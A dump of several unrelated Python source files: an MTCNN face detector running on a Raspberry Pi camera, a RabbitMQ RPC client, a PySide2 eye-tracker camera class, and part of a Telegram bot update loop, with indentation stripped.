xx1 = np.maximum(x1[I[-1]], x1[I[0:-1]])
yy1 = np.maximum(y1[I[-1]], y1[I[0:-1]])
xx2 = np.minimum(x2[I[-1]], x2[I[0:-1]])
yy2 = np.minimum(y2[I[-1]], y2[I[0:-1]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if type == 'Min':
o = inter / np.minimum(area[I[-1]], area[I[0:-1]])
else:
o = inter / (area[I[-1]] + area[I[0:-1]] - inter)
pick.append(I[-1])
I = I[np.where( o <= threshold)[0]]
return pick
def generateBoundingBox(map, reg, scale, t):
stride = 2
cellsize = 12
map = map.T
dx1 = reg[0,:,:].T
dy1 = reg[1,:,:].T
dx2 = reg[2,:,:].T
dy2 = reg[3,:,:].T
(x, y) = np.where(map >= t)
yy = y
xx = x
'''
if y.shape[0] == 1: # only one point exceed threshold
y = y.T
x = x.T
score = map[x,y].T
dx1 = dx1.T
dy1 = dy1.T
dx2 = dx2.T
dy2 = dy2.T
# a little stange, when there is only one bb created by PNet
#print "1: x,y", x,y
a = (x*map.shape[1]) + (y+1)
x = a/map.shape[0]
y = a%map.shape[0] - 1
#print "2: x,y", x,y
else:
score = map[x,y]
'''
#print "dx1.shape", dx1.shape
#print 'map.shape', map.shape
score = map[x,y]
reg = np.array([dx1[x,y], dy1[x,y], dx2[x,y], dy2[x,y]])
if reg.shape[0] == 0:
pass
boundingbox = np.array([yy, xx]).T
bb1 = np.fix((stride * (boundingbox) + 1) / scale).T # matlab index from 1, so with "boundingbox-1"
bb2 = np.fix((stride * (boundingbox) + cellsize - 1 + 1) / scale).T # while python don't have to
score = np.array([score])
boundingbox_out = np.concatenate((bb1, bb2, score, reg), axis=0)
#print '(x,y)',x,y
#print 'score', score
#print 'reg', reg
return boundingbox_out.T
def drawBoxes(im, boxes):
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
for i in range(x1.shape[0]):
cv2.rectangle(im, (int(x1[i]), int(y1[i])), (int(x2[i]), int(y2[i])), (0,255,0), 1)
return im
import time
_tstart_stack = []
def tic():
_tstart_stack.append(time.time())
def toc(fmt="Elapsed: %s s"):
print(fmt % (time.time()-_tstart_stack.pop()))
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
img2 = img.copy()
factor_count = 0
total_boxes = np.zeros((0,9), np.float)
points = []
h = img.shape[0]
w = img.shape[1]
minl = min(h, w)
img = img.astype(float)
m = 12.0/minsize
minl = minl*m
#total_boxes = np.load('total_boxes.npy')
#total_boxes = np.load('total_boxes_242.npy')
#total_boxes = np.load('total_boxes_101.npy')
# create scale pyramid
scales = []
while minl >= 12:
scales.append(m * pow(factor, factor_count))
minl *= factor
factor_count += 1
# first stage
scales = [0.128, 0.08, 0.148, 0.1]
tic()
for scale in scales:
hs = int(np.ceil(h*scale))
ws = int(np.ceil(w*scale))
if fastresize:
im_data = (img-127.5)*0.0078125 # [0,255] -> [-1,1]
im_data = cv2.resize(im_data, (ws,hs)) # default is bilinear
else:
im_data = cv2.resize(img, (ws,hs)) # default is bilinear
im_data = (im_data-127.5)*0.0078125 # [0,255] -> [-1,1]
#im_data = imResample(img, hs, ws); print "scale:", scale
im_data = np.swapaxes(im_data, 0, 2)
im_data = np.array([im_data], dtype = np.float)
PNet.blobs['data'].reshape(1, 3, ws, hs)
PNet.blobs['data'].data[...] = im_data
out = PNet.forward()
boxes = generateBoundingBox(out['prob1'][0,1,:,:], out['conv4-2'][0], scale, threshold[0])
if boxes.shape[0] != 0:
#print boxes[4:9]
#print 'im_data', im_data[0:5, 0:5, 0], '\n'
#print 'prob1', out['prob1'][0,0,0:3,0:3]
pick = nms(boxes, 0.5, 'Union')
if len(pick) > 0 :
boxes = boxes[pick, :]
if boxes.shape[0] != 0:
total_boxes = np.concatenate((total_boxes, boxes), axis=0)
#np.save('total_boxes_101.npy', total_boxes)
#####
# 1 #
#####
print("Pnet boxes:",total_boxes.shape[0])
print("Pnet time:")
toc()
#print total_boxes
#return total_boxes, []
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# nms
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
#print("[2]:",total_boxes.shape[0])
# revise and convert to square
regh = total_boxes[:,3] - total_boxes[:,1]
regw = total_boxes[:,2] - total_boxes[:,0]
t1 = total_boxes[:,0] + total_boxes[:,5]*regw
t2 = total_boxes[:,1] + total_boxes[:,6]*regh
t3 = total_boxes[:,2] + total_boxes[:,7]*regw
t4 = total_boxes[:,3] + total_boxes[:,8]*regh
t5 = total_boxes[:,4]
total_boxes = np.array([t1,t2,t3,t4,t5]).T
#print "[3]:",total_boxes.shape[0]
#print regh
#print regw
#print 't1',t1
#print total_boxes
total_boxes = rerec(total_boxes) # convert box to square
#print("[4]:",total_boxes.shape[0])
total_boxes[:,0:4] = np.fix(total_boxes[:,0:4])
#print("[4.5]:",total_boxes.shape[0])
#print total_boxes
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print total_boxes.shape
#print total_boxes
numbox = total_boxes.shape[0]
if numbox > 0:
# second stage
#print 'tmph', tmph
#print 'tmpw', tmpw
#print "y,ey,x,ex", y, ey, x, ex,
#print "edy", edy
#tempimg = np.load('tempimg.npy')
# construct input for RNet
tempimg = np.zeros((numbox, 24, 24, 3)) # (24, 24, 3, numbox)
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
#print "dx[k], edx[k]:", dx[k], edx[k]
#print "dy[k], edy[k]:", dy[k], edy[k]
#print "img.shape", img[y[k]:ey[k]+1, x[k]:ex[k]+1].shape
#print "tmp.shape", tmp[dy[k]:edy[k]+1, dx[k]:edx[k]+1].shape
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
#print "y,ey,x,ex", y[k], ey[k], x[k], ex[k]
#print "tmp", tmp.shape
tempimg[k,:,:,:] = cv2.resize(tmp, (24, 24))
#tempimg[k,:,:,:] = imResample(tmp, 24, 24)
#print 'tempimg', tempimg[k,:,:,:].shape
#print tempimg[k,0:5,0:5,0]
#print tempimg[k,0:5,0:5,1]
#print tempimg[k,0:5,0:5,2]
#print k
#print tempimg.shape
#print tempimg[0,0,0,:]
tempimg = (tempimg-127.5)*0.0078125 # done in imResample function wrapped by python
#np.save('tempimg.npy', tempimg)
# RNet
tempimg = np.swapaxes(tempimg, 1, 3)
#print tempimg[0,:,0,0]
RNet.blobs['data'].reshape(numbox, 3, 24, 24)
RNet.blobs['data'].data[...] = tempimg
out = RNet.forward()
#print out['conv5-2'].shape
#print out['prob1'].shape
score = out['prob1'][:,1]
#print 'score', score
pass_t = np.where(score>threshold[1])[0]
#print 'pass_t', pass_t
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis = 1)
#print("[5]:",total_boxes.shape[0])
#print total_boxes
#print "1.5:",total_boxes.shape
mv = out['conv5-2'][pass_t, :].T
#print "mv", mv
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
#print 'pick', pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[6]:",total_boxes.shape[0])
total_boxes = bbreg(total_boxes, mv[:, pick])
#print("[7]:",total_boxes.shape[0])
total_boxes = rerec(total_boxes)
#print("[8]:",total_boxes.shape[0])
print("Rnet time:")
toc()
#####
# 2 #
#####
#print("2:",total_boxes.shape)
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes)
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print 'tmpw', tmpw
#print 'tmph', tmph
#print 'y ', y
#print 'ey', ey
#print 'x ', x
#print 'ex', ex
tempimg = np.zeros((numbox, 48, 48, 3))
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
tempimg[k,:,:,:] = cv2.resize(tmp, (48, 48))
tempimg = (tempimg-127.5)*0.0078125 # [0,255] -> [-1,1]
# ONet
tempimg = np.swapaxes(tempimg, 1, 3)
ONet.blobs['data'].reshape(numbox, 3, 48, 48)
ONet.blobs['data'].data[...] = tempimg
out = ONet.forward()
score = out['prob1'][:,1]
points = out['conv6-3']
pass_t = np.where(score>threshold[2])[0]
points = points[pass_t, :]
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis=1)
#print("[9]:",total_boxes.shape[0])
mv = out['conv6-2'][pass_t, :].T
w = total_boxes[:,3] - total_boxes[:,1] + 1
h = total_boxes[:,2] - total_boxes[:,0] + 1
points[:, 0:5] = np.tile(w, (5,1)).T * points[:, 0:5] + np.tile(total_boxes[:,0], (5,1)).T - 1
points[:, 5:10] = np.tile(h, (5,1)).T * points[:, 5:10] + np.tile(total_boxes[:,1], (5,1)).T -1
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes, mv[:,:])
#print("[10]:",total_boxes.shape[0])
pick = nms(total_boxes, 0.7, 'Min')
#print pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[11]:",total_boxes.shape[0])
points = points[pick, :]
#####
# 3 #
#####
#print("3:",total_boxes.shape)
print("Onet time:")
toc()
return total_boxes, points
def initFaceDetector():
minsize = 20
caffe_model_path = "/home/duino/iactive/mtcnn/model"
threshold = [0.6, 0.7, 0.7]
factor = 0.709
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
minsize = facedetector[0]
PNet = facedetector[1]
RNet = facedetector[2]
ONet = facedetector[3]
threshold = facedetector[4]
factor = facedetector[5]
if max(img.shape[0], img.shape[1]) < minsize:
return False, []
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
containFace = (True, False)[boundingboxes.shape[0]==0]
return containFace, boundingboxes
def main():
# set the filter of the video -- VSCO! still not working maybe later
# here to try the method to moving the I/O blocking operations
# to a separate thread and maitaining a queue of decoded frames
# in an effort to improve FPS
# .read() method is a blocking I/O operation
camera = PiCamera()
camera.resolution = (352, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(352, 240))
stream = camera.capture_continuous(rawCapture, format="bgr", use_video_port=True)
camera.close()
vs = PiVideoStream().start()
time.sleep(2.0)
fps = FPS().start()
minsize = 20
caffe_model_path = "./model"
threshold = [0.6, 0.7, 0.7] #initial threshold: 0.6 0.7 0.7
factor = 0.709
caffe.set_mode_cpu() #comment the next few lines?
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
while True:
start = timer()
print("---------------------------------------------")
frame = vs.read()
#frame = imutils.resize(frame, width=400) #do we need to do the resize?
# convert the frame to gray scale and restore the BGR info
#grayFrame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#restore = cv2.cvtColor(grayFrame,cv2.COLOR_GRAY2BGR)
#img = restore
img = frame
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
# check rgb position
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
## copy img to positive folder
#if boundingboxes.shape[0] > 0 :
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/positive/'+os.path.split(imgpath)[1] )
#else:
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/negetive/'+os.path.split(imgpath)[1] )
img = drawBoxes(frame, boundingboxes)
cv2.imshow('cam', img)
if cv2.waitKey(1) &0xFF == ord('q'):
break
end = timer()
print ("Total time:",end-start)
fps.update()
#When everything's done, release capture
#cap.release()
cv2.destroyAllWindows()
vs.stop()
vs.update()
if __name__ == "__main__":
main()
|
__init__.py
|
"""An asynchronous RabbitMQ client usable for RPC calls"""
import logging
import secrets
import sys
import threading
import time
import typing
import pika
import pika.exceptions
from pika.adapters.blocking_connection import BlockingChannel
from pika.spec import Basic, BasicProperties
class Client:
__messaging_lock = threading.Lock()
"""Lock used to handle the switching between sending and receiving messages"""
__responses: typing.Dict[str, bytes] = {}
"""Dictionary containing the received messages"""
__events: typing.Dict[str, threading.Event] = {}
"""Dictionary containing the events which shall be set to true if an message was received"""
def __init__(
self,
amqp_dsn: str,
client_name: typing.Optional[str] = secrets.token_urlsafe(nbytes=16),
additional_properties: typing.Optional[typing.Dict[str, str]] = None,
mute_pika: typing.Optional[bool] = False,
):
"""Initialize a new RPC Client and open the connection to the message broker
:param amqp_dsn: The Data Source Name pointing to the message broker installation. This
Data Source Name should contain credentials, if not the standardized credentials (User:
`guest`, Password: `guest`) will be used for authentication
:type amqp_dsn: str
:param client_name: Optional name of the client which will be visible in the management
platform of the message broker, if the platform supports this
:type client_name: str, optional
:param additional_properties: Optional additional client properties which may be set
:type additional_properties: dict[str, str], optional
"""
# Get a logger for this client
if additional_properties is None:
additional_properties = {}
self._logger = logging.getLogger("amqp_rpc_client")
# = Check if the Data Source Name is a valid data source name =
self._logger.debug('Validating the following parameter: "amqp_dsn"')
# Check if the supplied string is not none
self._logger.debug("Checking if the parameter is not None")
if amqp_dsn is None:
raise ValueError("The amqp_dsn is a required parameter")
# Check if the supplied string does not contain whitespaces only
self._logger.debug("Checking if the parameter is not empty")
if len(amqp_dsn.strip()) == 0:
raise ValueError("The amqp_dsn may not be an empty string")
# = Check finished =
self._logger.debug('All checks for parameter "amqp_dsn" passed')
if mute_pika:
self._logger.warning("Muting the underlying pika library completely")
logging.getLogger("pika").setLevel("CRITICAL")
# Parse the amqp_dsn into preliminary parameters
_connection_parameters = pika.URLParameters(amqp_dsn)
# Create a new connection name which is added to the client properties later on
self.connection_name = "amqp-rpc-client#" + secrets.token_hex(nbytes=8)
self._logger.debug("Created connection name for new connection: %s", self.connection_name)
# Combine the additional client properties with those set manually here
_client_properties = additional_properties | {
"connection_name": self.connection_name,
"product": "AMQP-RPC Client",
"platform": "Python {}".format(sys.version),
"information": "Licensed under the 3-Clause BSD License. See the LICENSE file "
"supplied with this library",
"copyright": "Copyright (c) Jan Eike Suchard",
}
self._logger.debug("Setting the following client properties: %s", _client_properties)
# Set the client properties to the connection parameters
_connection_parameters.client_properties = _client_properties
# Create a new blocking connection
self._logger.info("Starting the connection to the message broker")
self._logger.debug("Creating a new BlockingConnection")
self._connection = pika.BlockingConnection(_connection_parameters)
# Open a new channel to the message broker
self._logger.debug("Opening a new channel with the BlockingConnection")
self._channel = self._connection.channel()
# Create a new queue which is exclusive to this client and will be deleted if the client
# disconnects. This queue is used for reading responses
self._logger.debug("Declaring a new exclusive auto-deleting queue in the opened channel")
self._queue = self._channel.queue_declare("", False, False, True, True)
# Save the name generated by the broker as response queue name
self._response_queue_name = self._queue.method.queue
self._logger.info("Connected to the message broker")
# Create an event for stopping the broker
self._stop_event = threading.Event()
# Create an event for allowing messages to be sent after creating the connection
self._allow_messages = threading.Event()
# Create a thread which will handle the data events sent by the broker
self._logger.debug("Setting up the data handling")
self._data_event_handler = threading.Thread(target=self._handle_data_events, daemon=True)
# Start the thread
self._logger.debug("Starting the data handling")
self._data_event_handler.start()
def _handle_data_events(self):
"""Handle new data events and cancel the communication with the message broker if the
event was set"""
# Create a new consumer
self._logger.debug("Creating new message consumer")
self._consumer = self._channel.basic_consume(
queue=self._response_queue_name,
on_message_callback=self._handle_new_message,
auto_ack=False,
exclusive=True,
)
# Start polling for new messages indefinitely
while not self._stop_event.is_set():
# Acquire the internal lock and process possible new data events on the connection
with self.__messaging_lock:
if self._connection.is_open:
self._connection.process_data_events()
self._allow_messages.set()
# Sleep for 0.005 seconds before rechecking the stop flag
time.sleep(0.005)
else:
self._logger.error(
"The connection to the message broker is closed. Stopping " "client"
)
self._stop_event.set()
# Since the stop flag was set we will now cancel the consuming process
self._logger.info("The stopping event was enabled. Cancelling the message consumer")
self._channel.basic_cancel(self._consumer)
# Now acquire the messaging lock to stop messages from being sent
with self.__messaging_lock:
# Close the queue used for responses
self._logger.debug("Closing the response queue")
self._channel.queue_delete(self._response_queue_name)
# Close the channel to the message broker
self._logger.debug("Closing the channel open to the message broker")
self._channel.close()
# Close the connection to the message broker
self._logger.debug("Closing the connection open to the message broker")
self._connection.close()
self._logger.info("Closed the connection to the message broker gracefully")
def _handle_new_message(
self,
channel: BlockingChannel,
method: Basic.Deliver,
properties: BasicProperties,
content: bytes,
):
"""Handle a new incoming message
This will add the response to the response dictionary and will set the event to true
:param channel: The channel used to retrieve the message
:param method: Information about the delivery
:param properties: Properties of the message
:param content: The content of the retrieved message
"""
# Check if the response contained a correlation id if not reject it and log it
if not properties.correlation_id:
self._logger.critical(
"The received message did not contain a correlation id. This "
"message is therefore not accepted and will be rejected"
)
self._channel.basic_reject(method.delivery_tag, requeue=False)
else:
self._logger.debug("Saving the response body to the message list")
self.__responses.update({properties.correlation_id: content})
self._logger.debug("Setting the event correlating to the message to received")
if self.__events.get(properties.correlation_id) is None:
self._logger.critical(
"Error in the messaging events. Unable to find event "
"associated with this correlation id"
)
raise IndexError("Unable to find Event with the correlation id")
else:
self.__events.get(properties.correlation_id).set()
def send(self, content: str, exchange: str) -> str:
"""Send a message to the exchange and get the created message id
:param content: The content which shall be sent to the message broker
:param exchange: The exchange in which the message shall be published
:return: The message id created to identify the request
"""
if not self._connection.is_open:
raise Exception("The AMQP client is not connected to the message broker")
# Create the message id
self._logger.debug("Creating a new message id")
message_id = secrets.token_urlsafe(nbytes=32)
self._logger.debug("Created message id: %s", message_id)
# Create a new event for the message and insert it into the dict
self._logger.debug("Creating a new event for this message")
self.__events.update({message_id: threading.Event()})
self._logger.debug("Created a new event for this message")
# = Send the message to the message broker =
# Acquire the messaging lock to allow this message to be sent
if self._allow_messages.wait():
with self.__messaging_lock:
self._logger.debug("Acquired the messaging lock for sending a message")
try:
self._channel.basic_publish(
exchange=exchange,
routing_key="",
body=content.encode("utf-8"),
properties=pika.BasicProperties(
reply_to=self._response_queue_name,
correlation_id=message_id,
content_encoding="utf-8",
),
)
except pika.exceptions.ChannelWrongStateError:
self._logger.warning(
"The channel used for sending the message is in the "
"wrong state for sending messages. Opening a new channel"
)
self._channel = self._connection.channel()
self._channel.basic_publish(
exchange=exchange,
routing_key="",
body=content.encode("utf-8"),
properties=pika.BasicProperties(
reply_to=self._response_queue_name,
correlation_id=message_id,
content_encoding="utf-8",
),
)
self._logger.debug("Published a new message in the specified exchange")
return message_id
def get_response(self, message_id: str) -> typing.Optional[bytes]:
"""Get a response from the response list
This method will try to get the response content from the dictionary of responses.
If the response is found it will be removed from the response dictionary
:param message_id: The id of the message which was created during the sending
:return: The message body if it already has a response else None
"""
# Check if the response is already available
self._logger.debug("%s - Checking if the response was already received", message_id)
response = self.__responses.pop(message_id, None)
if response is None:
self._logger.debug(
"%s - The response for the message has not been received yet", message_id
)
return response
def await_response(self, message_id: str, timeout: float = None) -> typing.Optional[bytes]:
"""Wait for the response to be handled and return it
This will remove the response from the list of responses
:param message_id: The id of the message which was created during the sending process
:param timeout: Time to wait for the event to be set
:return: The message if the timeout was not reached
"""
# Check if the message id is in the event dictionary
if message_id not in self.__events:
raise ValueError("%s - A message with this ID has not been sent", message_id)
self._logger.info("%s - Waiting for the response to the message", message_id)
# Try to get the event
message_returned = self.__events.get(message_id)
if not message_returned.wait(timeout=timeout):
self._logger.warning(
"%s - The waiting operation timed out after %s seconds and no "
"response was received",
message_id,
timeout,
)
return None
self._logger.debug("%s - Found Response for the message", message_id)
response = self.__responses.pop(message_id, None)
return response
|
camera_proc.py
|
from PySide2.QtGui import QImage, QPixmap
from PySide2 .QtCore import QObject, Signal, Slot, Property, QBasicTimer, QPoint
from PySide2.QtQuick import QQuickPaintedItem, QQuickImageProvider
from threading import Thread, Lock
from multiprocessing import Process, Pipe, Value, Condition, Array
import cv2
import numpy as np
import time
import uvc
import sys
import traceback
import ctypes
import os
class Camera(QQuickImageProvider, QObject):
'''
This is the base class for all cameras or video used in pEyeTracker.
It is mainly responsible for:
- gathering and managing cam / video specs
- starting / stop a streaming
- providing feedback of gaze data processing to the UI
'''
update_image = Signal()
def __init__(self, name=None):
QQuickImageProvider.__init__(self, QQuickImageProvider.Pixmap)
QObject.__init__(self)
self._image = self.to_QPixmap(cv2.imread("../ui/test.jpg"))
self._np_img = None
self.name = name
self.capturing = Value('i', 0)
self.dev_list = uvc.device_list()
self.fps_res = {}
self.modes = {}
self.mode = None # --> subclassed property
self.shared_array = None # --> subclassed property
self.shared_pos = None # --> subclassed property
self.source = None
self.cap = None
self.pipe, self.child = Pipe()
self.cam_process = None
self.vid_process = None
self.cam_thread = None
self.paused = False
self.gamma = 1.0
self.color = True
self.flip = False
def thread_loop(self):
while self.capturing.value:
time.sleep(0.005)
try:
img = self._get_shared_np_array()
img = self.process(img)
self._np_img = img
qimage = self.to_QPixmap(img)
if qimage is not None:
self._image = qimage
self.update_image.emit()
except Exception as e:
print(">>> Exception:", e)
def _get_shared_np_array(self):
nparray = np.frombuffer(self.shared_array, dtype=ctypes.c_uint8)
w, h = self.mode[0], self.mode[1]
return nparray.reshape((h,w,3))
def create_shared_array(self, mode):
w = mode[0]
h = mode[1]
return Array(ctypes.c_uint8, h*w*3, lock=False)
def requestImage(self, id, size, requestedSize):
return self._image
def requestPixmap(self, id, size, requestImage):
return self._image
def get_np_image(self):
return self._np_img
def get_processed_data(self):
nparray = np.frombuffer(self.shared_pos, dtype=ctypes.c_float)
return nparray
def init_process(self, source, pipe, array, pos, mode, cap): #abstract
return
def init_vid_process(self, source, pipe, array, pos, mode, cap): #abstract
return
def process(self, img):
return img
def join_process(self): #abstract
return
def join_vid_process(self): # abstract
return
def reset_model(self): #abstract
return
def get_processed_data(self): #abstract
return
def stop(self, video_file=False):
if self.capturing.value:
if self.paused:
self.pipe.send("play")
self.pipe.send("stop")
if video_file:
self.join_vid_process()
if self.vid_process.is_alive():
self.vid_process.terminate()
else:
self.join_process()
if self.cam_process.is_alive():
self.cam_process.terminate()
self.cam_thread.join(1)
def play(self, is_video):
if is_video:
if not self.capturing.value:
self.play_video_file()
else:
self.pipe.send("play")
self.paused = False
def pause(self, is_video):
if is_video:
self.pipe.send("pause")
self.paused = True
def get_source(self):
return self.source
def is_cam_active(self):
if self.cam_thread is not None:
if self.cam_thread.is_alive():
return True
return False
def set_source(self, source):
print('setting camera source to', source)
self.source = source
self.load_state()
self._set_fps_modes()
self.shared_array = self.create_shared_array(self.mode)
self.capturing.value = 1
self.init_process(source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.save_state()
self.cam_thread.start()
def set_video_file(self, filename):
cap = cv2.VideoCapture(filename)
w = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
h = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
f = cap.get(cv2.CAP_PROP_FPS)
self.source = filename
self.mode = (int(w),int(h),int(f))
self.modes = {}
self.shared_array = self.create_shared_array(self.mode)
ret, frame = cap.read()
if ret:
qimage = self.to_QPixmap(frame)
if qimage is not None:
self._image = qimage
self.update_image.emit()
cap.release()
def play_video_file(self):
self.capturing.value = 1
self.init_vid_process(self.source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.cam_thread.start()
def _set_fps_modes(self):
self.fps_res, self.modes = {}, {}
dev_list = uvc.device_list()
cap = uvc.Capture(dev_list[self.source]['uid'])
for i in range(len(cap.avaible_modes)):
mode = cap.avaible_modes[i]
fps = mode[2]
if fps not in self.fps_res.keys():
self.fps_res[fps] = []
self.modes[fps] = []
resolution = str(mode[0]) + " x " + str(mode[1])
self.modes[fps].append(mode)
self.fps_res[fps].append(resolution)
if self.mode not in cap.avaible_modes:
self.mode = sorted(cap.avaible_modes)[0]
cap.close()
@Property('QVariantList')
def fps_list(self):
return sorted(list(self.fps_res.keys()))
@Property('QVariantList')
def modes_list(self):
curr_fps = self.mode[2]
return self.fps_res[curr_fps]
@Property(int)
def current_fps_index(self):
curr_fps = self.mode[2]
fps_list = sorted(list(self.fps_res.keys()))
return fps_list.index(curr_fps)
@Property(int)
def current_fps(self):
curr_fps = self.mode[2]
return curr_fps
@Property(int)
def current_res_index(self):
w,h,fps = self.mode
curr_res = str(w) + " x " + str(h)
res_list = self.fps_res[fps]
return res_list.index(curr_res)
@Slot(str, str)
def set_mode(self, fps, resolution):
self.stop()
res = resolution.split('x')
self.mode = (int(res[0]), int(res[1]), int(fps))
self._set_fps_modes()
print("setting mode:", self.mode)
if resolution not in self.fps_res[int(fps)]:
print("setting mode:", self.modes[int(fps)][0])
self.mode = self.modes[int(fps)][0]
self.shared_array = self.create_shared_array(self.mode)
self.pipe, self.child = Pipe()
self.capturing.value = 1
self.init_process(self.source, self.child, self.shared_array,
self.shared_pos, self.mode, self.capturing)
self.cam_thread = Thread(target=self.thread_loop, args=())
self.save_state()
self.cam_thread.start()
@Slot(float)
def set_gamma(self, value):
self.gamma = value
self.pipe.send("gamma")
self.pipe.send(value)
@Slot(float)
def set_color(self, value):
self.color = value
self.pipe.send("color")
self.pipe.send(bool(value))
@Slot(float)
def flip_image(self, value):
self.flip = value
self.pipe.send("flip")
self.pipe.send(bool(value))
@Slot()
def reset(self):
self.reset_model()
def to_QPixmap(self, img):
if img is None:
return
if len(img.shape) == 3:
h,w,_ = img.shape
rgbimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
#flipimg = cv2.flip(rgbimg,1)
qimg = QImage(rgbimg.data, w, h, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qimg)
return pixmap
def save_state(self):
with open('config/'+self.name+'config.txt', 'w') as f:
data = str(self.mode[0]) + ':'
data += str(self.mode[1]) + ':'
data += str(self.mode[2]) #+ ':'
#data += str(self.gamma) + ':'
#data += str(int(self.color))
f.write(data)
def load_state(self):
if os.path.isfile('config/'+self.name+'config.txt'):
with open('config/'+self.name+'config.txt', 'r') as f:
d = f.readline().split(':')
self.mode = (int(d[0]), int(d[1]), int(d[2]))
if __name__=="__main__":
cam = Camera()
cam.set_source(0)
cam.start()
# dev_list = uvc.device_list()
# cap = uvc.Capture(dev_list[2]['uid'])
# print(cap.avaible_modes)
|
loop.py
|
import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
def run_as_thread(self, *args, **kwargs):
t = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class CollectLoop(RunForeverAsThread):
def __init__(self, handle):
self._handle = handle
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self):
while 1:
try:
msg = self._inqueue.get(block=True)
self._handle(msg)
except:
traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
def __init__(self, bot, on_update):
self._bot = bot
self._update_handler = on_update
def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
"""
Process new updates in infinity loop
:param relax: float
:param offset: int
:param timeout: int
:param allowed_updates: bool
"""
while 1:
try:
result = self._bot.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_updates)
# Once passed, this parameter is no longer needed.
allowed_updates = None
# No sort. Trust server to give messages in correct order.
for update in result:
try:
self._update_handler(update)
offset = update['update_id'] + 1
except:
pass
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
try:
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
return key, update[key]
except:
pass
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._handle = _infer_handler_function(bot, handle)
def run_forever(self, *args, **kwargs):
"""
:type relax: float
:param relax: seconds between each :meth:`.getUpdates`
:type offset: int
:param offset:
initial ``offset`` parameter supplied to :meth:`.getUpdates`
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
how long to poll.
:type allowed_updates: array of string
